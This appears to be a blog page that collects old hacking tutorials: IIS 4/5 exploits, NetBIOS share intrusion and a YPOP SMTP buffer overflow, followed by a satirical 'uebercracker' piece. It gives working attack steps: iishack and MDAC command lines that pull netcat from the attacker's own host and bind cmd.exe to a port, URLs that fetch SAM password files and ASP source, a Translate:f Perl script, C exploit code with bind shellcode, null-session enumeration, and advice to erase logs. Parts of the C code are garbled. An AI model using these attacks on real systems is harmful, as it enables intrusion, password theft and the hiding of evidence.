Forewords:
This text goes out to all those NT hackers out there. It is based on the info I have from eEye Digital Security Team, which found the exploit, and my own experience.
Note: All the files used in this paper can be found at the main page.
According to eEye Digital Security Team the systems affected include:
Internet Information Server 4.0 (IIS4)
Microsoft Windows NT 4.0 SP3 Option Pack 4
Microsoft Windows NT 4.0 SP4 Option Pack 4
Microsoft Windows NT 4.0 SP5 Option Pack 4
I performed the attack from a Windows NT 4.0 machine with the required programs:
iishack.exe
ncx.exe or ncx99.exe or BertzSvc.exe
Ncx.exe is a hacked up version of the program netcat.exe. Ncx.exe always passes -l -p 80 -t -e cmd.exe as its argument, which means that it binds cmd.exe to port 80. The eEye people has received some reports from people not being able use the ncx.exe, so they have made another hacked up version of netcat.exe, ncx99.exe. Ncx99.exe binds cmd.exe to port 99 instead of port 80, which should solve the problem. The reason of why ncx.exe doesn't work sometimes is that inetinfo.exe has to be exited, before it can work. Ncx.exe fits under the description Trojan horse! To kick inetinfo.exe use avoid.exe (which also soon will be available at the web site). BertzSvc.exe binds cmd.exe to port 123 instead.
How to do it:
First of all you'll need a server running IIS4, NT4 and/or SP3/4/5 + OP4. To find such, go to www.netcraft.com or you favorite “what's-this-site-running-search-engine” and find a victim running the affected system.Second, you need to craft a buffer overrun about 3 k on the target machine!
Then launch iishack.exe via the command prompt in WinNT.
Output:
--------(IIS 4.0 remote buffer overflow exploit)----------
(c) dark spyrit -- barns@eeye.com. http://www.eEye.com
[usage: iishack
eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe
do not include 'http://' before hosts!
----------------------------------------------------------
Then issue the command as you can see beneath ex.
C:\>iishack www.victim.com 80 YourOwnIpAddress/ncx.exe
Output (if successful):
Data sent!
note: Give it (the IIS) enough time to download ncx.exe. Hint: Use Rasmon.exe to monitor your outgoing bytes.
After that type telnet www.victim.com 80 in cmd.exe or in the start/run menu.
Output:
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\>
Voila! Access granted!
Do you whatever you wanna do, but remember to:
- add a scheduled task to restart inetinfo.exe in X minutes. (AT command will do it)
- add a scheduled task to delete ncx.exe X-1 minutes.
- clean the log files (if there are any).
Corrections, suggestions or comments are accepted here
---------------------------------------------------------------
Hi Folks,
i have just compiled the well-known IIS tricks. I hope it
will be helpful for securing your server.
any comment,suggestion or insult...? wellcome
MAB-
SECURING IIS by BREAKING
=====================================================
by Mount Ararat Blossom
9/15/2000
mount_ararat_blossom@hotmail.com
=====================================================
01- Abstract
I am not sure what you want to get out of this but basically this paper
is intended on breaking merely IIS web servers especially versions 4.0 and
5.0 via TCP/IP over the port 80. This techniques works against even
so-called secure networks just because every network even those secured ones
lets HTTP connections in.
=====================================================
02- Intro
Alright so you all wanna know how to break into IIS web servers? First off,
you should find a cgi-scanner so that things will get easier. My personnel
preferences are
"whisker" by "rain forest puppy" (www.wiretrip.net/rfp).
"cis" by "mnemonix" (www.cerberus-infosec.co.uk)
To understand which server is running on the victim site
telnet
GET HEAD / HTTP/1.0
and there you go with the name and the version of the web server. However
some sites might run their web servers over 8080, 81, 8000, 8001, and so on.
To understand SSL web servers, which provides encryption between the web
server and the browser we use the tool "ssleay"
s_client -connect
HEAD / HTTP /1.0
and here we go again.
As i am writing this i am hoping that you will be able to use this to
secure your web servers instead of using this to break into others.
=====================================================
03- Game Starts
========IIS HACK=====
The folks at www.eeye.com, have found a vulnerability on IIS 4.0 which
allows us to upload a crafted version of netcat (hacker's swiss army knife)
onto victim server and binds a cmd.exe on port 80.
The vulnerabliy was a bufferoverflow in .htr .idc and .stm files. The
problem is with insufficient bounds checking of the names in the URL for
.htr .stm and .idc files, allowing hackers to insert some backdoors to
download and execute arbitrary commands on the local system as the
administrator user.
To hack the victim site we need
iishack.exe
ncx.exe (you can find these two at
www.technotronic.com)
plus we need a web server running at our attacking box.
First off, run the web server on your attacking box and place
the ncx.exe on your root directory.
then run iishack.exe against the victim site
c:\>iishack.exe
Then here we go, go and get your swiss army knife, namely netcat,
c:\>nc
the command promt from the victim site suddenly appears on your box !!!
D:\> or whatever it is , C;E;...
do you want me to xplain what to do next, hey common you must be kidding
...hehe....
=========MDAC- Local Command Execution===========
You might think that it is a years-old vulnerability, however what i see on
pen-tests is that almost 40% of IIS web servers are still vulnerable to
this.
IIS' MDAC component has a vulnerability where an attacker can submit
commands for local execution.
The core problem is with the RDS Datafactory. By default, it allows remote
commands to be sent to the IIS server. The commands will be run as the
effective user of the service, which is typically the SYSTEM user.
I wont get into details, if you want go and check RFP's web
site. However, you can find a vulnerable site by checking
c:\>nc -nw -w 2
GET /msadc/msadcs.dll HTTP
and if you get the following
application/x_varg
it is most probably vulnerable if not patched.
You can find the exploit, mdac.pl and msadc2.pl from rain forest puppy's
web site at www.wiretrip.net/rfp It checks for the vulnerability and if it
is vulnerable then it asks for the command you wanna execute:
c:\> mdac.pl -h
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c
if you wanna change the web site which is located at
d:\inetpub\wwwroot\victimweb\index.htm
then you can type:
cmd/c echo hacked by me > d:\inetpub\wwwroot\victimweb\index.htm
or what ever you want but my personnal preference is uploading our swiss
army knife, netcat, and binding it to the cmd.exe to the port 80. To do that
i set up my TFTP server and put nc.exe in it. Then when i am asked to type
the command i want to execute, i type the following:
cmd/c cd %systemroot%&&tftp -i
&& attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe
there you go, go on fire your netcat against the victim over port 80, you
get the eggshell, cmd.exe.....
=========Codebrws.asp & Showcode.asp ==================
Codebrws.asp and Showcode.asp is a viewer file that ships with Microsoft
IIS, but is
not installed by default. The viewer is intended to be installed by the
administrator to allow for the viewing of sample files as a learning
exercise; however, the viewer does not restrict what files can be accessed.
A remote attacker can exploit this vulnerability to
view the contents of any file on the victim's server. However, there are
several issues to be aware of:
1. Codebrws.asp and showcode.asp are not installed by default.
2. The vulnerability only allows for viewing of files.
3. The vulnerability does not bypass WindowsNT Access Control Lists
(ACLs).
4. Only files in the same disk partition can be viewed.
5. Attackers must know the location of the requested file.
Lets say you wanna see the code of codebrws.asp request the following from
the from your favorite web browser,
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/
iisamples/exair/howitworks/codebrws.asp
then you will see the source code of codebrws.asp
For using showcode.asp, do the following again from your infamous browser
http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/repair/sam._
There you go, you get the infamous sam._ file, copy it, expand it and crack
it using Lophtcrack, my personal choise, and you will get all user passwords
even the administrator one.
=========Null.htw===============
Microsoft IIS running with Index Server contains a vulnerability
through Null.htw even if no .htw files exist on the server. Thevulnerability
displays the source code of an ASP page or otherrequested file. The ability
to view ASP pages could provide sensitive information such as usernames and
passwords. An attacker providing IIS with a malformed URL request could
escape the virtual directory, providing access to the logical drive and root
directory. The "hit-highlighting" function in the Index Server does not
adequately restrain what types of files may be requested, allowing an
attacker to
request any file on the server. Microsoft has released a patch for Windows
2000 addressing this vulnerability.
Null.htw function has 3 variables which gets their inputs from the user.
These variables are as follows
CiWebhitsfile
CiRestriction
CiHiliteType
Respectively.
Say that, we wanna see the source code of default.asp, the type the
following from your favorite browser
http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
and you will get the source of default.asp file.
========webhits.dll & .htw================
The hit-highligting functionality provided by Index Server allows a web
user to have a document with their original search terms highlighted on the
page. The name of the document is passed to .htw file with the CiWebhitsfile
argument. Webhits.dll, the ISAPI Application that deals with the request,
opens the file highlights accordingly and returns the resulting page. As the
user has control of the CiWebhitsfile argument passed to the .htw file they
can request anything they want. And the real problem is that, they can view
the source of ASP and other scripted pages.
To unserstand you are vulnerable, request the following from the site
http://www.victim.com/nosuchfile.htw
if you get the following from the server
format of the QUERY_STRING is invalid
it means that you are vulnerable.
The problem is because of webhits.dll (an ISAPI Application) associated to
.htw files. You can find the .htw files in the following locations of
infamous IIS web server,
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (this is normally for loopback)
An attacker, for instance view the contents of sam._ file as follows
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?ciwebhitsfile=/../../winnt/repair/sam._&cirestriction=none&cihilitetype=full
will reveal the contents of sam._ file, which is binary, you should copy
it, expand it and crack it as i explained several times before.
===ASP Alternate Data Streams(::$DATA)==================
The $DATA vulnerability, published in mid-1998, results from an error
in the way the Internet Information Server parses file names. $DATA is an
attribute of the main data stream (which holds the "primary content") stored
within a file on NT File System (NTFS). By creating a specially constructed
URL, it is possible to use IIS to access this data stream from a browser.
Doing so will display the code of the file
containing that data stream and any data that file holds. This method can be
used to display a script-mapped file that can normally be acted upon only by
a particular Application Mapping. The contents of these files are not
ordinarily available to users. However, in order to display the file, the
file must reside on the NTFS partition and must
have ACLs set to allow at least read access; the unauthorized user must also
know the file name. Microsoft Windows NT Server's IIS versions 1.0, 2.0, 3.0
and 4.0 are affected by this vulnerability.
Microsoft has produced a hotfix for IIS versions 3.0 and 4.0. The fix
involves IIS "supporting NTFS alternate data streams by asking Windows
NT to make the file name canonical" according the Microsoft.
To view or get the source of an .asp code, type the following from your
browser
http://www.victim.com/default.asp::$DATA
and you will get the source code.
=========ASP Dot Bug====================
The famous Lopht group has discovered the ASP dot bug in 1997. The
vulnerability involved being able to reveal ASP source code to attackers. By
appending one or more dots to the end of an ASP URL under IIS 3.0, it was
possible to view the ASP source code.
The exploit worked by appending a dot the end of an ASP as follows
http://www.victim.com/sample.asp.
======ISM.DLL Buffer Truncation===============
This bug was found by Cerberus Information Security team. It runs on IIS
4.0 and 5.0. that allows attackers to view the content of files and source
code of scripts.
By making a specially formed request to IIS, with the name of the file and
then appending around 230 + “ %20 “ (these represents spaces) and then
appending “ .htr ” this tricks IIS into thinking that the client is
requesting a “ .htr “ file . The .htr file extension is mapped to the
ISM.DLL ISAPI Application and IIS redirects all requests for .htr rsources
to this DLL.
ISM.DLL is then passed the name of the file to open and execute but before
doing this ISM.DLL truncates the buffer sent to it chopping off the .htr and
a few spaces and ends up opening the file we want to get source of. The
contents are then returned.
This attack can only be launched once though., unless the web service
started and stopped. It will only work when ISM.DLL first loaded into
memory.
An attacker can view the source of global.asa, for instance, as follows
http://www.victim.com/global.asa%20%20(...<=230)global.asa.htr
will reveal the source of global.asa
==========.idc & .ida Bugs=======================
This exploit, actually, similar to ASP dot bug, however this time we get
the path of web directory on IIS 4.0. I have even seen this bug working on
IIS 5.0 on my pen-tests. By adding an “.idc” or “.ida” extension to the end
of URL will cause IIS installations to try to run the so-called .IDC through
the database connector .DLL. If the .idc doesnt exists, than it will return
rather informative about the server.
http://www.victim.com/anything.idc or anything.idq
you will get the path.
============+.htr Bug===========================
This exploit is also ever so similar to dot asp bug and you can get the
source code of ASA and ASP files by appending a +.htr to the URL of asp and
asa files.
http://www.victim.com/global.asa+.htr
you may get the source code to browse
===========NT Site Server Adsamples Vulnerability ======
By requesting site.csc, which is normally located in
/adsamples/config/site.csc,
The attacker may be able to retrieve the DSN, UID and PASS of the database
as this file may contain them.
By typing the following
http://www.victim.com/adsamples/config/site.csc
the attacker will download the file site.csc and (s)he can get some
important data.
==========Password Attack to User Accounts===========
IIS 4.0 has an interesting feature that can allow a remote attacker to
attack user accoounts local to the web server as well as other machines
across to the internet. Added to this if your Web server is behind a
firewall performing NAT (network address translation), machines on inside
could be attacked as well.
By default every install of IIS 4.0 creates a virtual directory “
/iisadmpwd “. This directory contains a number of .htr files. Anonymous
users are allowed to access this files, they are not restricted to loopback
address(127.0.0.1). The following is a list of files found in the .iisadmpwd
directory, which physically maps to c:\winnt\system32\inetsrv\iisadmpwd
Achg.htr
Aexp.htr
Aexp2.htr
Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot.htr
Anot3.htr
This files are pretty much of the same variants of the same file and allow
a user to change their password via web. It can also be used to enumerate
valid accounts through guess work.
If the user account does not exist, a message will be returned saying
“invalid domain”.
If the account exists, but the password is wrong then the message will say
so.
If an IP address followed by a backslash precedes the account name then the
IIS server will contact the remote machine, over the NetBIOS session port
139, and attempt to change to user’s password. (x.x.x.x\ACCOUNTNAME)
Therefore, if you do not need this service, remove the /iisadmpwd
directory. This will prevent attackers.
=============Translate:f Bug ====================
Daniel Docekal brought this issue in BugTraq this summer, August 15, 2000.
(www.securityfocus.com/bid/1578) The actual problem is with the WebDAV
implementation in office 2000 and FrontPage 2000 Server Extensions.
When someone makes a request for ASP/ASA or anyother scriptable page and
adds “translate:f “ into headers of HTTP GET (headers are not part of URL,
part of HTTP request), then they are come up with complete ASP/ASA source
code on Win2K SP1 not installed.
Translate:F is a legitimate header for WebDAV and is used in WebDAV
compatible client and in FP2000 to get the file for editing.
Simple adding of “translate:f” and placing “/” at the end of request to HTTP
GET will lead in security bug.
It is a Win2K bug, but due to FP2000 installed IIS4.00, it is also a IIS4.0
bug.
You can use the following perl script to use this exploit.
#############################
use IO::Socket; #
my ($port, $sock,$server); #
$size=0; #
#############################
#
$server="$ARGV[0]";
$s="$server";
$port="80";
$cm="$ARGV[1]";
&connect;
sub connect {
if ($#ARGV < 1) {
howto();
exit;
}
$ver="GET /$cm%5C HTTP/1.0
Host: $server
Accept: */*
Translate: f
\n\n";
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($server) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error:
$!";
connect(SOCK, $paddr) || die "Error: $!";
send(SOCK, $ver, 0) || die "Can't to send packet: $!";
open(OUT, ">$server.txt");
print "Dumping $cm to $server.txt \n";
while(
print OUT
}
sub howto {
print "type as follows: Trans.pl www.victim.com codetoview.asp \n\n";
}
close OUT;
$n=0;
$type=2;
close(SOCK);
exit(1);
}
If we call the script as translate.pl then we can get a ASA/ASP source code
as follows
Trasn.pl www.victim.com codetoview.asp
And there you go, you get the source code of codeview.asp.
04- Conclusion
All the information i have given you has been widely used in wild. However
what i tried to do was just to collect all these information together as to
check the security of our famous IIS 4.0 and 5.0. Wheneveri encounter a IIS
web server during my pen-tests, i do check for these vulnerabilities and
most of the time one of these works.
I hope that, what i written was helped you in some way. Thanks for reading
it, please continue to support me as i continue to release this sortta
papers. If you wanna learn more, please check the mentioned people’s web
sites for more details and you can even write to me.
Peace in mind
Watch your servers in wild
Hacking iis tutorial
Sunday, December 2, 2007Posted by ekansh at 1:16 AM 0 comments
Net bios hacking
Decided to put this here instead of windows because it really is for beginners.
NETBIOS BASED HACKING TUTORIAL BY GAURAV KUMAR
gkverma@msn.com
Preface
Dear reader I have written this tutorial keeping in mind that readers having only the basic knowledge will also be able to know how hackers hack using NetBIOS. Using NetBIOS for hacking is the probably the easiest way to hack remotely. I strongly oppose hacking but not ethical hacking. An ethical hacker is one that hacks computer networks not for anti social reasons but to let the network administrators know about the security holes so that they can prevent their computers from hacking. If you want to contact me please send me a mail to gaurav@sec33.com
Contents-
A brief lesson on NetBIOS
The NBTSTAT command
What you need to hack ?
Types of attacks
Searching for a victim
Lets Hack - Part 1 Remotely reading/writing to a victim's computer
Cracking "Share "passwords
Using IPC$ to hack Windows NT
Penetrating in to the victim's computer
Lets Hack - Part 2 Denial of service attack
How to protect yourself
_______________________________________________________________________________
______________________________
A BRIEF LESSON ON NETBIOS
NetBIOS stands for Network Basic Input Output System .It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows Operating Systems (like Windows98 , Windows Me, Windows NT etc), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computer . Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network with by issuing command to NetBIOS . NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include-
Name of the computer
Username
Domain
Computer Name
and many others.
Like any other service it also works on a port . It has been assigned a port number 139.
________________________________________________________________________________
______________________________
THE NBTSTAT COMMAND
You can manually interact with the NetBIOS with the help of NBTSTAT command. To use this command click on the start button then select RUN... and type "command" without quotes to launch MS-DOS Command Prompt. Alternatively you may click on Start Button then go to Programs and then select Command Prompt. Once you are in Command Prompt you can exit by typing command EXIT . To launch Command Prompt in full screen mode press ALT+ENTER key combination .To get back to the original window again press ALT+ENTER key combination. If you have launched the command prompt you will get
c:\windows>
If you do not get windows displayed after c:\ don't worry just keep going , all required commands will work fine.
Now lets play with the NBTSTAT command.
If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.
c:\windows>nbtstat/?
If you want to get the NetBIOS information of your computer type the following command
c:\windows>nbtstat -a 127.0.0.1
This command will list the NetBIOS information. A typical example
NetBIOS Remote Machine Name Table
Name Number Type Usage
==========================================================================
workgroup 00 G Domain Name
my_computer 03 U Messenger Service
myusername 03 U Messenger Service
MAC Address = 00-02-44-14-23-E6
Please note that we have used our ip address to be 127.0.0.1 . This ip address is called as "Loop Back" ip address because this ip address always refers to the computer you are using.
This example is self explanatory . We need not go in details. We need to know about the Name and Number. The Name displays the Name of the NetBIOS and there is a corresponding hexagonal number . You may see some additional names in your case.
If you want to get the NetBIOS names of a remote computer, the command is
c:\windows>nbtstat -a ipaddress
Example - To get the NetBIOS names of a computer having ip address 203.195.136.156, we shall use the command
NOTE-203.195.136.156 may be a active ip address of someone's computer. I am using it only as an example. Please don't hack this computer.
c:\windows>nbtstat -a 203.195.136.156
If you want to get to know more about the ip address and ports click here
________________________________________________________________________________
____
WHAT YOU NEED TO HACK
All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and an internet connection.
________________________________________________________________________________
____________________________
TYPES OF ATTACKS
We can launch two types of attack on the remote computer having NetBIOS.
1. Reading/Writing to a remote computer system
2. Denial of Service
________________________________________________________________________________
_____________________________
Searching for a victim
You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If at first you don't succeed step to next ip address until you find a suitable ip address. You may also use a port scanner .A port scanner is simply a software that can search for any block of ip address say 192.168.0.1 to 192.168.0.255 for one or more ports. "Orge" is a port scanner that gives NetBIOS names of the remote computer.
________________________________________________________________________________
____________________________
Lets Hack -Part 1 Remotely reading/writing to a victim's computer
Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However there is a condition that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it , the nbtstat command will display one more NetBIOS name. Now lets us take a example. Suppose you know a ip address that has enabled File And Printer Sharing and let suppose the ip address happens to be 203.195.136.156 .
If you would like to know more about ip address click here . If you don't the ip address where File and Printer Sharing is enabled read "Searching for a victim"
The command that you will use to view the NetBIOS name is
c:\windows>nbtstat -a 203.195.136.156
Let suppose that the output comes out to be
NetBIOS Remote Machine Name Table
Name Type Status
-------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
The number <20> shows that the victim has enabled the File And Printer Sharing.
-------------------------------------------------------------------------------------------------------------------------------------------------------------
NOTE - If you do not get this number there are two possibilities
1. You do not get the number <20> . This shows that the victim has not enabled the File And Printer Sharing .
2. You get "Host Not found" . This shows that the port 139 is closed or the ip address doesn't exists.
---------------------------------------------------------------------------------------------------------
Now our next step would be to view the drive or folders the victim is sharing.
We will use command
c:\windows>net view \\203.195.136.156
Let suppose we get the following output
Shared resources at \\203.195.136.156
ComputerNameGoesHere
Share name Type Used as Comment
-----------------------------------------------------------------------------------------------
CDISK Disk
The command completed successfully.
"DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like
Shared resources at \\203.195.136.156
ComputerNameGoesHere
Share name Type Used as Comment
-----------------------------------------------------------------------------------------------
HP-6L Print
"Print " shows that the victim is sharing a printer named as HP-6L
If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer's hard disk or printer.
Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim's hard disk 's name is CDISK.
Now we will connect our computer to that hard disk . After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK it means that we our drive will have the same contents as that of the CDISK .
Lets do it.
We will use the NET command to do our work .
Let suppose we want to make a drive k: on our computer and connect it to victim's share we will issue the command
c:\windows>net use k: \\203.195.136.156\CDISK
You may replace k letter by any other letter.
If the command is successful we will get the confirmation - The command was completed successfullly
The command was completed successfully
Now just double click on the My Computer icon on your desktop and you will be a happy hacker!
We have just crested a new drive k: . Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!
GO TO CONTENTS
________________________________________________________________________________
_____________________________
Cracking Share passwords
Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker "PQWAK" . All you have to enter ip address and the share name and it will decrypt the password within seconds. Please note that this can crack only the passwords is the remote operating system is running on -
Windows 95
Windows 98
Windows Me
GO TO CONTENTS
________________________________________________________________________________
______________________________
Using IPC$ to hack Windows NT,2000,XP
Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.
IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.
We hackers use IPC$ in this way
c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""
You may replace k letter by any other letter. If you replace it by "b" (type without quotes) a new drive will be created by a drive letter b.
Please note that you won't be able to get access to victim's shared drives but you you can gather valuable information like names of all the usernames, users that have never logged, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - its my favorite toot however it is run on command promt.
GO TO CONTENTS
________________________________________________________________________________
______________________________
Penetrating in to the victim's computer
Now that you have access to a remote computer you may be interested in viewing his secret emails, download hismp3 songs , and more...
But if you think like a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger or install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involves writing to victim's hard disk . For this you need to have write access permission.
GO TO CONTENTS
________________________________________________________________________________
_____________________________
Lets Hack - Part 2 Denial of service attack
This type of attacks are meant to be launched by some computer techies because this type of attack involves using Linux Operating System and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder,securityfocus etc and comiple them.
The two most common vulnerabilities found in NetBIOS are
Vulnerability 1
Vulnerability 2
Another vulnerability that has been foud recently is that one can launch a DoS attack against winodws NT,2000,XP,.NET system. For detailed information and pacth plz visit this link http://www.microsoft.com/technet/treeview/...in/MS02-045.asp.
I have checked my web servers that are still vulnerable to this type of attack.
________________________________________________________________________________
______________________________
How to protect yourself
Please visit windowsupdate.microsoft.com and let the windows update itself.
Posted by ekansh at 1:15 AM 0 comments
Ypop Smtp Remote Buffer Overflow Exploit
The Bug is to send a request with more than 504 bytes that will overwrite ESP and cause a stack based overflow.
Example:
Telnet localhost 25
220 YahooPOPs! Simple Mail Transfer Service Ready
504xA CODE
The EIP register will be overwritten and our code will be executed
here is a little exploit
CODE
/*-= ---------------------------------- =-
* = YPOP SMTP Remote Buffer Overflow =
* = BindShell Exploit by cyrex =
* = Tested on Win2k SP4 =
*-= ---------------------------------- =-
* = Info: =
* = If you need more offsets you need =
* = to get the JMP Address of =
* = libcurl.dll and the return address =
* = of it. Try your luck. =
*-= ---------------------------------- =-
* = Usage: =
* = ./ypop -h
*-= ---------------------------------- =-
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
//;W32 BindShellcode by cyrex
//;Listen on port 4567
//;uses exit thread
unsigned char shellcode[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56"
"\x53\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7"
"\xa4\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9"
"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"
"\x8d\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59"
"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"
"\x54\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"
"\xff\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x11\xd7\x89\xe0"
"\x6a\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff"
"\x55\x20\x89\xc7\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00"
"\x10\x00\x00\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";
// Tested on Win2k SP4
char ret_code[]="\x23\x9b\x02\x10"; //JMP ESP - libcurl.dll
char jump_back[]="\x89\xe3\x66\x81\xeb\xfb\x01\xff\xe3";
int fd,bytes;
void usage(char *prog)
{
printf("Usage: %s
printf("------\n");
printf(" -h
printf(" -p
}
int main(int argc, char *argv[])
{
int arg,port,stack,i;
char evilbuf[1024];
char *hostname;
char buffer[300];
struct hostent *he;
struct sockaddr_in client;
printf("YPOP SMTP Remote Buffer overflow v0.4-0.6\n");
printf(" BindShell Exploit by cyrex\n");
printf("- - - - - - - - - - - - - - - - - - - - - \n");
if(argc<4) arg="getopt(argc," hostname="optarg;" port="atoi(optarg);" he="gethostbyname(hostname))="="NULL)" fd="socket(AF_INET,SOCK_STREAM,0))="="-1){" sin_family =" AF_INET;" sin_port =" htons(port);" sin_addr =" *((struct">h_addr);
if(connect(fd, (struct sockaddr *)&client,sizeof(struct sockaddr))==-1) {
printf("[-] Can't Connect to %s\n",hostname);
exit(-1);
}
printf("[+] Connected!\n");
if((bytes=recv(fd,buffer,300,0)) == NULL)
{
printf("[-] Error Receiving Welcome\n");
exit(-1);
}
buffer[bytes]='\0';
if((strstr(buffer,"220")==NULL) (strstr(buffer,"YahooPOPs")==NULL) {
printf("[-] Hmm.. you sure this is a SMTP Server?\n");
exit(-1);
}
stack=504-sizeof(shellcode);
memset(evilbuf,0,sizeof(evilbuf));
for(i=0;i
printf(" -> telnet %s %i\n",hostname,port);
}
Posted by ekansh at 1:12 AM 0 comments
How to become a master hacker
This is a paper will be broken into two parts, one showing 15 easy steps
to becoming a uebercracker and the next part showing how to become a
ueberadmin and how to stop a uebercracker. A uebercracker is a term phrased
by Dan Farmer to refer to some elite (cr/h)acker that is practically
impossible to keep out of the networks.
Here's the steps to becoming a uebercracker.
Step 1. Relax and remain calm. Remember YOU are a Uebercracker.
Step 2. If you know a little Unix, you are way ahead of the crowd and skip
past step 3.
Step 3. You may want to buy Unix manual or book to let you know what
ls,cd,cat does.
Step 4. Read Usenet for the following groups: alt.irc, alt.security,
comp.security.unix. Subscribe to Phrack@well.sf.ca.us to get a background
in uebercracker culture.
Step 5. Ask on alt.irc how to get and compile the latest IRC client and
connect to IRC.
Step 6. Once on IRC, join the #hack channel. (Whew, you are half-way
there!)
Step 7. Now, sit on #hack and send messages to everyone in the channel
saying "Hi, Whats up?". Be obnoxious to anyone else that joins and asks
questions like "Why cant I join #warez?"
Step 8. (Important Step) Send private messages to everyone asking for new
bugs or holes. Here's a good pointer, look around your system for binary
programs suid root (look in Unix manual from step 3 if confused). After
finding a suid root binary, (ie. su, chfn, syslog), tell people you have a
new bug in that program and you wrote a script for it. If they ask how it
works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask
them to trade for their get-root scripts.
Step 9. Make them send you some scripts before you send some garbage file
(ie. a big core file). Tell them it is encrypted or it was messed up and
you need to upload your script again.
Step 10. Spend a week grabbing all the scripts you can. (Dont forget to be
obnoxious on #hack otherwise people will look down on you and not give you
anything.)
Step 11. Hopefully you will now have atleast one or two scripts that get
you root on most Unixes. Grab root on your local machines, read your
admin's mail, or even other user's mail, even rm log files and whatever
temps you. (look in Unix manual from step 3 if confused).
Step 12. A good test for true uebercrackerness is to be able to fake mail.
Ask other uebercrackers how to fake mail (because they have had to pass the
same test). Email your admin how "layme" he is and how you got root and how
you erased his files, and have it appear coming from satan@evil.com.
Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag
about your exploits on #hack to everyone. (Make up stuff, Remember, YOU are
a uebercracker.)
Step 14. Wait a few months and have all your notes, etc ready in your room
for when the FBI, Secret Service, and other law enforcement agencies
confinscate your equipment. Call eff.org to complain how you were innocent
and how you accidently gotten someone else's account and only looked
because you were curious. (Whatever else that may help, throw at them.)
Step 15. Now for the true final supreme eliteness of all uebercrackers, you
go back to #hack and brag about how you were busted. YOU are finally a
true Uebercracker.
Now the next part of the paper is top secret. Please only pass to trusted
